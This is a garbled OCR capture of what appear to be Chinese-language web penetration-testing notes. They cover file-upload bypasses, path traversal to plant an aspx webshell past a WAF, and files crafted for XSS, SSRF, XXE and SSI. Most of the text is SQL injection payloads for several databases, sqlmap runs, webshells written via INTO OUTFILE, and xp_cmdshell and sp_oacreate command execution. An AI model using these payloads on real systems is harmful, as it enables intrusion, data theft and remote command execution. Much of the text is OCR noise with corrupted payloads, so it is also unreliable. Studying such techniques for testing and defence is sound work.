[T NE cu] SRP 








04 - RAHI - 
PRT WATER - SME + RINE Sa HET 


S pria coveuu Merest 6 coge COBX- T GE CC OG 


Q 建立 安全 连接 失败 


我 和 页面 时 与 服务 器 的 汇 接 被 一 起 ， 






oR PTAC ROMER Se, HAR Bee, 
© REIN LAAT RR Rie eae, 


x 


B | 
BUNT, XXfielname, WNLESSARBSAT, SABE, 
是 不 是 我 们 的 aspx 马 没有 成 功 上 传 ? 尝试 随便 访问 一 个 不 存在 的 aspx 文 件 ， 是 不 是 也 被 拦 


图 可 知 ， 如 果 aspx 文 件 不 存在 ， 则 返回 404， 而 不 是 被 拦截 。 
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e eG 会 j i o 
- 
TAMERS È EFLA OWNERS Massi G Googe CONT (NOE 7C GARR 


/' 应 用 程式 中 发 生 伺服 器 错误 。 


RRA. 
iE TP oe CER OE zHoepeeeHece Ties AGL SMEC ECS SSS, BMY UR RSS oe ERA 





BEM URL: $5 ücLcas"eacher ie 5/2 ? OMM aspx 
BS: 既然 成 功 上 传 了 aspx 马 ， 为 什么 这 个 aspx 的 站 点 却 无 法 加 载 我 们 成 功 上 传 的 aspx 马 呢 ? 
以 加 载 他 们 自己 的 aspx 文 件 。 


猜测 : waf 是 不 是 对 这 个 目录 进行 了 拦截 ， 对 其 他 的 目录 没有 拦截 。 


验证 : 我 们 上 传 的 文件 都 在 BS_UpLoad 目 录 下 ， 而 之 前 我 们 看 到 BIRSS 目 录 下 有 aspx 文 件 。 那 
试 往 其 他 目录 下 写 一 句 话 。 


又 因为 上 传 的 文件 名 可 控 ， 我 们 利用 ../ 跳 转 到 上 层 目录 


构造 的 payload 为 : filename="111/../../../.JBIRSS/222.aspx" 





isiZaspxSiR(z, PUER 


OC dg 
".&MEEue SRL Oranit Masen © Googe CO BUY Cae 


了 


Ghia mc Rf 





EA—tRuES 
? d 
ten! n Fil ti 
Pay quest n 
01574 
c" o 
uw festa 5 coge 5 AF gem cO emcee 
[s] x 
本 
Ay ns BASSIN AR 


尝试 写 入 大 马 
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Mw 


1 D. 前 





0x06 upload-labs 过 关 


E 


2. 修改 content-type 为 image/gif 


9. 黑 名 单 : php3,phtml 


4. ma: 上 传 .htaccess 


B. 黑 名 单 : 大 小 写 phP 
6. RES: 空格 


Hi 


DA 黑 名 单 : 点 


L8. 22%: ::$DATA 


9. ZZA: info.php.. (点 + 空格 + 点 ) 
10、 黑 名 单 : WS 

下、 白 名单 : get 型 %00 截 断 

12、 白 名 单 : post 型 %00 截 断 ，url 解 码 
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13、 上 传 图 片 马 ， 配 合 包 含 漏洞 p ot 
- 
17. RRS 


18. KARP 


0x06 造 洞 




















Xt fm. 











htmlxft: 造 出 一 个 xss 漏 洞 


swf Xft: 造 出 一 个 xss 漏 洞 










































































svg 文 件 : 造 出 一 个 xss 漏 洞 





pdf 文件 : 造 出 一 个 XSS 漏 洞 和 URL 跳 转 漏 洞 











exexft: 钓鱼 



































mp4，avi 文 件 : ssrf 漏 洞 














任意 后 缀 文件 ， 只 要 文件 内 容 为 xxe: 













































































shtml 文 件 : ssi 命 令 执 行 


xlsx: xxe 漏 洞 





1 svg 文 件 


1.svg 


















































<svg xmins="http://www.w3.org/2000/svg" onload="alert(1)"/> 
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y Users/Asus/Desktop/2.svg 
DA PSSE O ERAR C HE-T cea AREF O Googie [] Markdown RAR. Oze qe d 


的 9 SQL BASICS: UNION BASED» ERROR/DOUBLE QUERY- TOOLS- WAF BYPASS- ENCODING: HTML: ENCRYPTION 







samt L ke A ANKAA 4 XM 
OTHER: e es 











E Replace A Y^ : 












ES > Ww 127.0.0.1 








127.0.0.1 £X 








意 文件 后 缀 ， 只 要 内 容 是 xxe 内 容 
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_XXE 代 码 : 


#EXTM3U 






































#EXT -X-MEDIA-SEQUENCE: 0 


























#EXTINF:10.0, 








concat:http://VPS_IP:VPS_PORT/header .m3u8 


#EXT -X-ENDLIST 








读 取 文 件 payload 


#EXTM3U 





#EXT-X-MEDIA-SEQUENCE:@ 
#EXTINE:10.2, 









































concat:http: //yngwie.ru/header .m3u8 | file: ///etc/passwd 


#EXT-X-ENDLIST 



























































4 shtml 文 件 ssi 命 令 执行 





<!--#ECHO var="SERVER_SOFTWARE" - -> 





<!--#echo var="Server_name" --> 
<!--#echo var="remote_user" --> 


命令 参考 链接 : https: //www.secpulse.com/archives/66934. html 








4420 r 
t formedata lean. he igh 
i 
i430 | 
jContent-Pinpomation: fotm-dat: t f 
‘ease LOUIE ATELIER 10023 
(Content -Pinposition: formdara: name=" imsgeCut Bean, spoF i 1e Ext" sirt Window parent callbackWaiquani succese , /uploadfiles/usetPhoto/2019050! s 


2351.2htal 200.300. Juploadfiles/userPhoto/201905010023255T.3hUml , shtml sees 
df iles/userPhoto/2019050100212557 shtml} i 





Tontent-Dimpos:tion: fopm-dara 
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i view-source:http://. adfiles/userPhoto/2019050100232557.shtml 
T > 
erie Desar Dessa V login - Vultncom ^ E-F. era Coss maie. Masons 


- 


:OOOO 09:0:0:5 099:9-09:-9:009000^0-0009:009-0:00 997/0097 79:900 Er 
: esee 99:9:99:9:0000..970 60 09/0009 OSTOON 5659. 169 0:6099979:7-9 9! 






























45:9 人 = X. $999. OO 97:6099099::90n:9.:099 7 7299397 
56519 97:6:99979:—-9- 799 9" 997 19:996 69:919 OOOO OO OOOO :si 
$9:090910. TO OOOO 099:09:2: IO- ONO OOOOE OOOO OOOO OOOO: GOO 90 * 
OOCOO 00:0000. 0007-000 OO7O OH-O OOOOO: 950-100 

OO OPT ni Tre O00 OO) 79:909 GOTTEN OO nO Te OOO OD 50709 60x66 OOO 64 
dV $9209 7p 49kBQ9o5 “TOTS 145%" O2G1GGO0 OOOO O<GOPICH2( 659 11161569069 69 5 CUQu 

OO 7V9X9u9h696 (6 ^ 959 (H 

1640109?6ua29169 3 

69301009 9191-::0 7: 0276070050797. 99 55569:0529:009709:00 BN OOOOYO 

é 1706690:0569600020200::099953009 79530T160M-9 9t VAG 

2OENO Ga! OX. MIO 1 191609) 0920949 " Sdn bé pr $8549 6 Vbi Pup $999 1574s 
OOO OO OOOO OO 1977 79997597 ie TEST SH 59.9 7:999 $9: 4 
r@ 15697959 OOD OO 5 -OOO .OiO :| ^ 09599 : zoon 

T DEDEK OOO 90 :97709:099:9:009099 8°60 9:9" 79 

EEEE E EEO A I 

OO. NOD 9:49:59 1^9!09909 (OOH detA 90 9 HAMOFOOOT: “ZFS OOS OH, HAOaOO 人 1 OGel. OE 
i9 HHO OO” 0-90 099008 > Orin =F OO" 09 =O @= OO OO Of” 

)$990:9 09 97: "OOFOO: 1:0977-9:0:09109 ^9 9:99. 9e- exu ie =@- 9999:099* 959 9:59 
$559v65999U99.9 9099 OO) 1 OOCALBOWODOO'O >= “i SPECI. SHO. 404435. 9569 9t 

OIO CO HO O00 O-000 7959715997 6925:769:09 OO TELE HO "OOO 926910091975 ROH! 
$99 TO. 50% O50 MOTO 


576 OOOO OO 19 :09:099:599^ : 59700099709 FDO HOO 5 7 59:9.9:9979:99" 

























TETT 
“BALE zip, 并 解压 

| 打开 [Content_Types] .xm1， 在 头 部 加 入 xxe payload 
Bir icti. 之 后 修改 后 缀 为 XLSx 

i 在 上 传 点 上 传 改 文件 ， 上 传 后 服务 器 自动 打开 文件 ， 触 发 xxe 


Dnslog 平 台 查 看 结果 
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注入 漏洞 







































































N 
st 
© 









































































































库 种 类 : Access 注 入 ，Mssql 注 入 ，Mysql 注 入 ，Oracle 注 入 
B: GET 注 入 ，POST 注 入 ，Cookie 注 入 (ua 注入 ) 

点 类 型 数字 型 注入 ， 字 符 型 注入 ， 搜 索 型 注入 

种 类 : 联合 注入 ， 盲 注 布尔， 时 间 ， 报 错 ) 


| ess 注 入 


一 个 数据 库 ， 里 面 存放 很 多 表 


sgl ISS- Encryption: Encoding Other 
[itp //192 168 145. 126/acp/Preduction/PRODUCT,DETATL asp?id=IS1] UNTON SELECT 1,2,3,4,5,6, 7,8, 9, 10, 11, 12, 13, 14,15, 16, 17, 16, 19, 20, 21,22 from admi: 








st data [7 Enable Referrer 


451513 UNION SELECT 1,2, 3.4/5.6, 7.8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21,22 from admin 











: SQL 注入 
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POC: | 


查询 版 本 


1' and @@version>0- - 


查询 权限 


1' and user>0-- 


数据 库 


1' and db_name()>0-- 


1' and (SELECT top 1 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


' and 1=(select name 


其 余数 据 库 就 不 列 出 来 了 


Name FROM Master..SysDatabases)>0-- 


from 


from 


from 


from 


from 


from 


from 


from 


from 


from 


from 


from 


6csfx 


master. 


master 


master 


master. 


master 


master. 


master. 


master 


master 


master. 


master 


master 


dbo.sysdatabases where dbid=1)-- master 


.dbo 


.dbo. 


dbo. 


.dbo. 


dbo. 


dbo. 


.dbo. 


.dbo. 


dbo. 


.dbo. 


.dbo. 


. sysdatabases 


sysdatabases 


sysdatabases 


sysdatabases 


sysdatabases 


sysdatabases 


sysdatabases 


sysdatabases 


sysdatabases 


sysdatabases 


sysdatabases 
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where 


where 


where 


where 


where 


where 


where 


where 


where 


where 


where 


master 


dbid-2)-- 


dbid-3)-- 


dbid-4)-- 


dbid-5)-- 


dbid-6)-- 


dbid-7)-- 


dbid-8)-- 


dbid-9)-- 


dbid=10)-- 6csfx 
dbid-11)-- 6WJQTX 


dbid-12)-- 6WJQDDJYX 















tempdb 
model 
msdb 

Repor tServer 
ReportserverT 
SBW20151120. 6. 
cnet 2017 


6WJQHSZX 


人 


1' And (sElect Top 1 name from sysobjects where xtype=0x55)>0-- Users 


列 


! SELECT * FROM Users HAVING 1=1-- Users.pkId 


f 


' And (sElect Top 1 UserName from Users)>0-- default 


' and 1-convert(int,(SELECT TOP 1 UserName FROM Users WHERE ID NOT IN ('1')))-- 


— MYSQUEA 


— Mysql5.0 AF 


同 Access 注 入 





EER: C:\Windows\SysWOW64\cmd.exe — 





" you want to 
| 
| 


H 


use common table existence check? [y/N/q] y 


I 


Please enter number of threads? [Enter for 1 (current?] 10 


2:26:48] [CRITICAL] connection timed out to the target url or proxy. sqlmap is 
9ing to retry the request 
4^2:27:111 [CRITICALI unable to connect to the target url or proxy. sqlmap is 
'8 to retry the request 
|] INI issued s Yo a i 
2:29:35] [CRITICAL] unable to connect to the target url or proxy. sqlmap is 
ny to retry the request 





{ ii š Y r] tí 
EME Poa PT i 


22:38:29] (CRITICAL] connection tined out to the target url or proxy. sqlmap is 


ed? 


er aborted (Ctrl*C was pressed multiple tines) 
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Mysql5.0 以 上 注入 


order by 解释 
Ci\phpStudy\mysql\bin\mysal.exe 


25 vows in set (6.06 sec> 
* from proxies priv; 
Proxied_user Vith grant Grantor Timestamp 


1 2012-08-29 19:13:95 ， 


row in set (Ø. 


Priv order by J 
o——— pr 


User i Proxied host | Proxied user With grant Grantor Timestamp 


} i i E 
root | H T 2012-08-29 19:13:95 : 
i i EN ut 


row in set (8.68 sec?) 


select * from proxie 


User Proxied host Proxied_user With grant Grantor Timestamp 


localhost root 


M * S GATA 1 A 
i i 1 2012-88-29 17:13:05 
+ > "E 二 


row in set (0.00 sec> 


mysql> select * from proxies priv order by 8; | 
ERROR 1854 (42822): Unknoun column ’8’ in 'order clause’ | 
l> select * from proxie riv order by 7; 
] m z E reek EVA "10x 4. GMT EA 
User | Proxied host Proxied user i Vith grant. | Grantor 


Suec er Sepia AES vt ay E a L aoa AUN, 1 GU SUM Qe o rr the RB cT a eA SEAN, 


localhost root 


1 
, 
* 
' 
9 
+ 


row in set (8.08 sec? 


ysq b> 
union 解释 


mvsql select * from news where id -l; 





id title content 





DoraBox  DoraBox is very good. 





mysql> select * from news where id -l union select 1,2} 





title content 





DoraBox: DoraBox is very good. 
$4), 


ea 





—— MM—— — 


rows in Set (0. 03 sec) 












://demo.sqli 


ct username, 


5: //demo. sqli 


lect username, 


jk 


获取 用 户 名 


ittp://demo.sqli 


* 获取 数据 库 名 


http: //demo.sqli 


* 获 取 表 名 


"Ww. b + > 


.com/Less-1/?id=1 


password from security.users where id = '1' limit 0, 1; 


.com/Less-1/?id=1' 


password from security.users where id = '1'' limit 0, 1; 


.com/Less-1/?id--1' union select 1,user(),3 %23 


.com/Less-1/?id=-1' union select 1,database(),3 %23 
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http://demo.sqli.com/Less-1/?id--1' union select 1, group_concat(table mg 


| # 获取 列 名 





| http://demo.sqli.com/Less-1/?id=-1' union select 1,group_concat(column_n 


| # 获取 数据 


http://demo.sqli.com/Less-1/?id--1' union select 1,group concat(username), 


) 少见 的 注入 点 


IM 搜索 框 注入 


1' and '1%'='1// 返 回 正确 的 搜索 结果 





1' and '1%'='2// 没 有 返回 搜索 结果 





请 输入 简短 的 关键 字 : 1 |] 留言 搜索 | 








1' and '1%'='1// 返 回 正确 的 搜索 结 
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i BANERA: (1 and lt%=1 | gwsx| o o 


[留言 内 容 ] 功 放 在 刚 开 机 没有 温度 上 时 ， 有 滋 滋 的 电流 声 ， 是 什么 原因 ? 返 厂 维修 如 
何 联系 ? 价格 多 少 ? 电话 联系 












[版 主 回复 ] 回复 时 间 : 2016-11-23 
! 建议 你 把 机 器 襄 回 厂家 维修 ， 详 细 请 致 姐 联 


你 


[ 雷 言 内 容 ] 我 的 DC211AK 只 有 一 个 声 遵 有 声音 ， 重 换 音 箱 后 也 一 样 ， 寡 回 厂家 能 修 


吗 ? 











[版 主 回 复 ] ASHE: 2016-6-29 
你 好 这 个 故障 需要 青 回 厂 进行 检测 维修 的 。 谢 谢 你 的 留言 


Rg h - ite tes pus ET diui 
EUEPER! 


t-IP User-Agent 
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Administrator: C\Windows\systemazy 
€ 


} sting if <custom) HFADER parameter ‘Client IP 84%’ is dynamic 

} stom) HEADER parameter 'Client-IP M=’ does not appear to he Ayna, 

} tics detected web page charset “Big9 y 

} ! INFO) t HEADEL 

} ic } testing for SQL injection on Ccustem> HEADER paraneter ‘Client IP ti. 

it looks like the back-end DBMS is ‘Oracle’. Do you want te ship test payloads specific f，、 

or the remaining tests, do you want. to include all tests for ‘Oracle’ extending provided | t 
} ting ‘AND hoolean-based blind WHERE or HAVING clause’ e 

^stinq 'Boolean-based blind Paraneter replace Coriginal value)’ 


Client ip , 


} 
} ing AND hoo lean- be d blind WHERE or HAVING clause COTxXsy. 
] ing e OR boolean-hased blind WHERE or HAVING clause COTKSy> 
J ng ` boolean blind Parameter replace’ 
1 ing Y > boolean blind Parameter replace (original Galue 
1 ing hoolean 3 blind ORDER BY. GROUP BY clause’ 
1 ing 'Oracle boolean blind ORDER BY. GROUP BY clause Catigina) 
J “Oracle boolean blind Stacked queries’ 
i ng ‘Oracle AND error-bazsed WHERE or HAVING clause CXMLT ype)” 
} 1 i pat lient-IP #1* Oracle AND error-hased VHI 
} sting ‘Oracle inline querie 
J sting 'Oracle stacked ; (DBMS PIPE.RECEIUE MESSAGE ~ connento' 
} i “Orac acked queries DBMS PIPE.RECEIVE M AGE>’ 
} ‘Oracle acked qt s Cheavy query connment>’ 
} Oracle stacked queries 
] “Ohac le stacked queries OCK . SLE conment >’ 
H 'Oracle : ced que N » id 
H 'Oracle : sked queries > 3 conment)>’ 
J 'Oracle < ed queries (USER LOCK : 
] ng ‘Oracle AND time-based blind’ 
1 ing “ acle OR tine d blind’ 
} ing acle AND time-based blind Ccomment>’ 
} ing acle OR tine d blind “comment >’ 
} ting 'Oracle AND time-based blind Cheavy query)’ 
} INFO} t Client-IP #1* 1 Oracle AND time -} 
| ) 1 ) testing ‘Generic UNION query (NULL) 1 to 28 columns’ 
custom) HEADER parameter ’Client-IP 81*’ is vulnerable. Do you want to keep testing the other 
sqimap, identified the following injection point<s> with a total of 7 HITP<s> reque 
Parameter: ClientoIP Hiw (Ccuston> HEADER? 
á Lune exroan-hased k 
Title: Oracle AND error-based WHERE or HAUING clause XMLI ype) 
Payload: 1/2} <SELECT. CHRC'29) 1 1CHRC825 1 1CHRC1152 1 :CHRC99»5. FROM DUAL WHERE 4753-47257 AND 67 
Type: AND/ZOR time-based blind 
Title: Oracle AND t ine-ba blind <heavy query») 
Payload: 1/1 i<SELECT CHR< CHRC115) 1 iCHRC?5>$ 3CHRC71> PROM DUAL WHERE 48134813 AND 480 
} INFO] t 
seb server operating system: Windows 
seb application technology: PHP 5.2.6, Apache 2.2.8 
ack-end DBMS: Oracle 
| ) | } fetched data logged to text files under ' Jsers\Adninistrator\AppData Lo: 


=] ending @ 15:52:28. 72019-82-187 
TES 
EI 
何 为 言 注 》 言 注 就 是 在 sq 注入 过 程 中 ，sql 语 名 执行 的 选择 后 ， 选 择 的 数据 不 能 回 显 到 前 端 页 面 
此 时 ， 我 们 需要 利用 一 些 方法 进行 判断 或 者 尝试 ， 这 个 过 程 称 之 为 言 注 。 

基于 布尔 型 SQL 言 注 即 在 SQL 注入 过 程 中 ， 应 用 程序 仅仅 返回 True (页 面 ) 和 False (页 面 ) 


延 时 注入 是 主要 针对 页 面 无 变化 、 无 法 用 布尔 真 假 判 断 、 无 法 报错 的 情况 下 的 注入 技术 


报错 注入 构造 payload 让 信息 通过 错误 提示 回 显 出 来 


布尔 盲 注 


e 

ut 

e 
~*~ 


d 






PARES, ， 并 没有 返回 404 页 面 ， 证 明 库 的 长 度 为 8 字 节 


* 5 Double Query: Single 4 


B 17001 
- 12 


Welcome 
You are in........... 


“#4 判断 是 否 存在 言 注 
) id=1' and sleep( if( (select length(database()) >0) , 5, © ) )%23 

3 id=1 ' WAITFOR DELAY '0:0:5'--+ 

5 使 用 言 注 获取 数据 

判断 数据 库 个 数 : http://192.168.203.1/sqli/Less-9/?id-1*27and*20If(( select count(* 


获取 当前 数据 库 的 名 字 长 度 : http://192.168.203.1/sqli/Less-9/?id-19*27and*201f(( select 


获取 数 当 前 据 库 名 字 : http://192.168.203.1/sqli/Less-9/?id=1%27and%20If( ascii(substr 


获取 指定 数据 库 表 名 的 个 数 : http://192.168.203.1/sqli/Less-9/?id-1*27andX201f(( select 
获取 指定 数据 库 表 名 的 名 字 长 度 : http://192.168.203.1/sqli/Less-9/?id=1%27and%20If(( sel 


获取 指定 数据 库 的 表 名 名 字 :http://192.168.203.1/sqli/Less-9/?id=1%27and%20If( ascii(st 


b 
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id-i*and (select 1 from(select count(*),concat (Ox5e5e5e, version(), 0x5e5e5g Poy. 
深入 理解 报错 注入 原理 
https://mp.weixin.qq.com/s? —biz-MzASNDYOOTQOMw--&mid-403404979&idx-1&sn-2]000i 


Sqlmap 


os-shell Mysql 


注入 点 恰巧 又 是 root 权 限 , 这 时 你 就 可 以 直接 党 试 往 目标 的 网 站 目录 里 面 写 webshell, 但 还 是 有 个 前 
提 ,secure_file_priv 为 空 


b LNfndoosioystemazyemnd ascAgpDst 





g Ce D 192.168.1.7 


YEARS 6 新 手 上 路 ” 门 ] 常用 网 址 Dansa V Log In - Vultr.com BET, race 


sqlmap file uploader 
浏览 ,,， 未 选择 文件 。 
to directory: C:\wamp\wWebCode\bw, upload 
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ese, Flog peter, SIMI 
各 二 是 mysql 高 版 本 的 安全 模式 ，secure_file_priv 的 值 为 nu1l。 
第 三 种 是 secure_file_priv 指 定 了 某 个 目录 才 可 以 上 传 ， 根 目录 不 允许 上 传 ， 那 么 可 以 尝试 往 upload 目 对 


-27010 -iMBsecure file priviSIUS 2 SUEHEZE T HER, WRLERHLHHS, RAARSMA. M: 


第 一 种 情况 : 进入 - -sql-shell 
show global variables like '%secure%'; 


当 secure_file_priv 的 值 为 nulL1 ， 表 示 限 制 nysq1d 不 允许 导入 | 导出 ， 那 就 无 法 写 入 马 


PR 


第 二 种 情况 : 


往 upload 等 其 他 目录 上 传 ， 不 要 往 根 目录 上 传 


第 三 种 情况 : 


如 果 secure_file_priv 的 值 为 空 也 写 不 进去 ， 那 就 尝试 手动 写 入 ， 使 用 - -proxy "http://127.0 


> 





-os-shell MSSQL 


Pfor /r C: %i in (*xxx*) do @echo %i 





she 11> 


Eos-shell» for /Zr C: zi in ¢*mkzc-tp*> do Recho %i 
do you want to retrieve the command standard output? [V/n/al 


Bcomnand standard output [11]: 
Ux]. GNG Nimage \nkzc-tp.dpg 


los~shell> echol “<z@ Page Language ="Iscript "%*>*<veval Request .Itemf cat1] "unsafe"2;x^5» > Crs 
do you want to retrieve the command standard output? (¥/n/al 


command standard output E1]: 


[x] 


os-shell? dir cis Nimage 
do you want to rev, .cve the command standard output? [Y/n/al 





SASH 


WeSEUEC Teas ts INTO OUTFILE 导入 ， 写 入 文件 


http://192.168.1.7:85/sqli 1.php?title-a' UNION SELECT 1,2,'«?php Qeval($ post[E 


4 load file 导出 ， 读 取 文 件 


http://192.168.1.7:85/sqli_1.php?title=a' UNION SELECT 1,2, load_file('C:\\windon 


# 如 果 读 取 不 出 来 ， 则 将 读 取 的 内 容 写 入 到 当前 Web 目录 里 ,后缀 为 txt， 然 后 访问 


http://192.168.1.7:85/sqli 1.php?title-a' UNION SELECT 1,2, load_file(‘'c:\\window 


> 


使 用 TERMINATED 写 入 一 句 话 





654 









lor !1'='1' 写 不 进去 。 因 为 前 面 的 语法 错误 ， 导 致 无 法 执行 ]imit 后 面 的 语句 


/192.168.1.7:85/sqli 1.php?title-a' LIMIT 0,1 INTO OUTFILE 'C:/Wamp/WebCoc 


or 'i'-'i' MESA. MEMAN, (HEU Torz/E, fblimitfUBimnAtiENe, Maen 


0://192.168.1.7:85/sqli 1.php?title-a' or '1'='1' LIMIT 0,1 INTO OUTFILE 'C:/ 


ET 





加 or1=1 


Wsqlmap --os-shell | 安全 模式 为 空 


ta 


upload ELF 


安全 模式 为 /www/upload 万 一 上 传 的 文件 内 容 为 空 加 or 1=1 
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` 
Met » 


%5c，%bf ' ， 单 引号 ， 双 引号 ， 反 和 斜 枉 ， 负 数 ， 特 殊 字 符 ，and，or ，xor 探 测 是 否 存在 注入 ! | 






注意 : 〈-- ) 一 定 要 在 注释 符号 后 加 空格 ， 或 者 URL 编 码 后 的 空格 (x20) ， 否 则 注释 符号 不 会 产 
注释 符 # - -+ 交替 用 ， 二 个 不 行 ， 就 另 一 个 


1、 先 判断 是 数字 型 还 是 字符 型 ， 如 果 判 断 不 出 来 跳 到 9 








| 2、 接 着 判断 有 没有 括号 


3、 最 后 面 跟 上 - -+ 注释 符 


P 


4. order by 判断 字段 数 ， 如 果 没 法 判断 ， 则 直接 union select 1, 2, 3 一 个 个 测试 过 去 


4 


oe 
7 


如 果 返 回 的 页 面 发 生变 化 ， 则 联合 查询 











6 
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如 果 union select 1,version(), 3 返回 的 页 面 没有 发 生变 化 ， 即 联合 查询 失败 ， 则 尝试 报错 注 ， 


7、 如 果 报错 注入 页 面 也 没有 把 信息 显示 出 来 ， 则 延 时 注入 


了 









































8、 如 果 延 时 注入 也 不 行 ， 则 导入 导出 


P 


9、 尝 试 延 时 注入 ， 如 果 从 1 过 来 的 ， 则 三 种 情况 ， 直 接 跟 pay1oad， 参 数 后 面 加 单 引号 或 者 双 引 号 


+ 











Payload 
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B/or/***/2/***/like/***/1-- 用 /***/ 蔡 换 空格 ， 用 1ike 替 换 = 具体 案例 看 漏洞 






TETA 


r rpad('',1,user())#lor lpad('',1,user())="r" 


ARA: 使 用 %5c，%5c 是 \ 的 ur1 编 码 


—ttp://URL/Home/Orders/index/currency/965c ,html 
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You have an i 
error in your SQL syntax; check the manual that correspong 






















































































































































































































































































































































































如 果 过 了 5 秒 才 显示 页 面 ， 则 存在 注入 


BENCHMARK(100000,MD5(1)) or sleep(5) 


id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+ 
id=1' or sleep(ord(substr(password,1,1))) -- 
id=1'XOR(sleep(if((select length(database()) >6),0,5)))XOR'Z 


id=1'and (SELECT 1 FROM (SELECT(SLEEP(5)))Gbqj) --+ 


Referer :1'XOR(if (now()=sysdate(),sleep(6),0))XOR'Z 
ua: 'XOR(if (now( )=sysdate(),sleep(6),0))XOR'Z 


x-forw: 'XOR(if (now( )=sysdate(),sleep(6),0))XOR'Z 


id=1' WAITFOR DELAY '0:0:5'--+ 
id=1';WAITFOR DELAY '0:0:5'--+ 


id=1');WAITFOR DELAY '0:0:5'--+ 


id-1" WAITFOR DELAY '0:0:5'--+ 


id=1";WAITFOR DELAY '0:0:5'--+ 


id=1");WAITFOR DELAY '0:0:5'--+ 


id=1' or 51 = '49'; WAITFOR DELAY '0:0:5'--+ 
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id=1' and sleep( if( (select length(database()) >0) , 5, © ) )%23 


i 


id=1'/**/AND/**/(SELECT/**/*/**/FROM/**/(SELECT(SLEEP(5) ) )ibEg)/** 


sr 


ur 



































































































































































































































id=1' AND SELECT SUBSTRING(table_name,1,1) FROM informati 
id=1' if 1-1 waitfor delay '0:0:5' else waitfor delay 'g. 
',0)if 9527=9528-2 waitfor delay'0:0:5'--+ 
if (system_user!='sa') waitfor delay '0:0:5' --+ 


WHILE 2>1 PRINT Pss 


/*** /and/*** /sleep(/***/if(/***/(select/***/length(databag 
/***/and/***/If(ascii(substr(database(),1,1))-1,1, s1eep(10))---* 
/*** /WAITFOR/***/DELAY/***/'0:0:10' --- 
;WAITFOR/***/DELAY/***/'90:0:10' --* 


);WAITFOR/***/DELAY/***/'0:0:10' --* 


!'/*** /and/***/sleep(/***/if(/***/(select/***/length(database())/***/20)/*999 
'/*** /and/***/If(ascii(substr(database(),1,1))=1,1,sleep(10))--+ 
! /*** /WATTFOR/* **/DELAY/***/'9:0:10' - -4 

' IWAITFOR/***/DELAY/***/'0:0:10' --* 


! ); MAITFOR/***/DELAY/***/'9:0:10' - -* 


" /*** /and/***/sleep(/***/if(/***/(select/***/length(database())/***/»0)/***/r 
"/***/and/***/If(ascii(substr(database(),1,1))-1,1,s1leep(10))---* 
I ** * /WATTEOR/***/DELAY/***/'9:9:10' -- 
""WAITFOR/***/DELAY/***/'0:0:10' - -* 


") ;WAITFOR/***/DELAY/***/'0:0:10' - -* 
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PGUSEEEP(S) OR GENERATE_SERIES(1, 10000) 






















错 注入 ， 爆 数据 库 版 本 

pay10ad 都 是 数字 型 ， 如 果 是 字符 型 ， 就 在 1 后 面 添加 单 引 号 或 者 双 引 号 

1+and (select 1 from(select count(*),concat(0x5e5e5e, version(),0x5e5ese, floor 
- and (select 1 from (select count(*),concat(0x5e, version(),0x5e, f loor(rand(€ 


21 union select count(*),1,concat(0x5e5e5e, version(),0x5e5e5e, floor(rand(0)*2) 


(updatexml(1, concat(0x7e, (select user()),@x7e),1))--+ 
(extractvalue(1,concat(0x7e, (select user()),0x7e)))--+ 
geometrycollection((select * from(select * from(select user())a)b))--+ 
multipoint((select * from(select * from(select user())a)b))--+ 
polygon((select * from(select * from(select user())a)b))--+ 

id=1+and multipolygon((select * from(select * from(select user())a)b))--+ 
linestring((select * from(select * from(select user())a)b))--+ 
multilinestring((select * from(select * from(select user())a)b))--+ 
exp(~(select * from(select user())a))--+ 


PostgreSQL: /?param=1 and(1)=cast(version() as numeric)--+ 
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re mn » : 
MSSQL: /?param-i and(1)=convert(int, @@version) --+ 


Sybase: /?param=1 and(1)=convert(int, @@version) --+ 







Oracle >=9.0: /?param=1 and(1)=(select upper (XMLType(chr (60) | |chr(58) | |ch 


replace(banner,chr(32),chr(58)) from sys.v_$version where rownum=1) | |chr(¢ 


Oracle 报 错 注入 


' AND 1932=(SELECT UPPER(XMLType(CHR(60) | |CHR(58) | |CHR(113) | |CHR(106) | |CHR(1 


如 果 sqlmap 跑 不 出 ， 则 加 参数 - -level 5 --risk 3 


risk 


共有 四 个 风险 等 级 ， 默 认 是 1 会 测试 大 部 分 的 测试 语句 ，2 会 增加 基于 事件 的 测试 语句 ，3 会 增加 OR 语句 的 SQ 


662 


122)| go 












— sp configure 'xp_cmdshell',1 


M reconfigure 


xp cmdshell "whoami" // 在 mssql 中 ， 转 义 符 为 "" 转 义 字 符 "" 
被 删除 的 xp cmdshell 


EC sp addextendedproc xp_cmdshell ,@dllname -'xplog70.dll' 提示 找 不 到 xplog70.dll 
要 自己 上 传 。 


. Sp oacreate 


3 EXEC sp configure 'show advanced options', 1; 
_ RECONFIGURE WITH OVERRIDE; 
EXEC sp_configure 'Ole Automation Procedures', 1; 


- RECONFIGURE WITH OVERRIDE; 


: EXEC sp configure 'show advanced options', 0; 


7 
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* 
g- ¥ 


declare Qshell int exec sp_oacreate 'wscript.shell',Qshell output e 


此 方法 无 回 显 ， 可 把 命令 执行 结果 写 到 web 路 径 下 或 者 配合 dns 侧 信 道 
1. 沙 盒 执行 

需要 当前 mssql 用 户 有 写 注 册 表 权限 

开启 


exec sp_configure 'show advanced options',1;reconfigure;exec sp_configy 


exec master..xp regwrite 'HKEY LOCAL MACHINE', 'SOFTWARE\Microsoft\Jet\4, 


select * from openrowset('microsoft.jet.oledb.4.0', '; databasezc: \windows\ 


在 默认 安装 mssql 2012 上 报错 "无 法 创建 链接 服务 器 “(null)" 的 OLE DB 访问 接口 
“microsoft.jet.oledb.4.0" 的 实例 。" 暂 未 找到 解决 办 法 


1. CLR 执 行 


Common Language Runtime(CLR) 程 序 集 定义 为 可 以 导入 SQL Server 的 .NET DLL (或 DLL 组 ) e 
导入 后 ，DLL 方 法 可 以 链接 到 存储 过 程 并 通过 TSQL 执 行 。 创 建 和 导入 自 定义 CLR 程 序 集 的 能 力 
发 人 员 扩展 SQL Server 本 机 功能 的 好 方法 ， 但 自然 也 为 攻击 者 创造 了 机 会 。 以 C# 代 码 为 例 ， 将 
代码 用 CSC 编 译 为 dll 
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using System.Data.SqlClient; 
using System.Data.SqlTypes; 
using Microsoft.SqlServer.Server; 
E System.IO; 

re d 


using System.Diagnostics; 


| using System.Text; 
public partial class StoredProcedures 


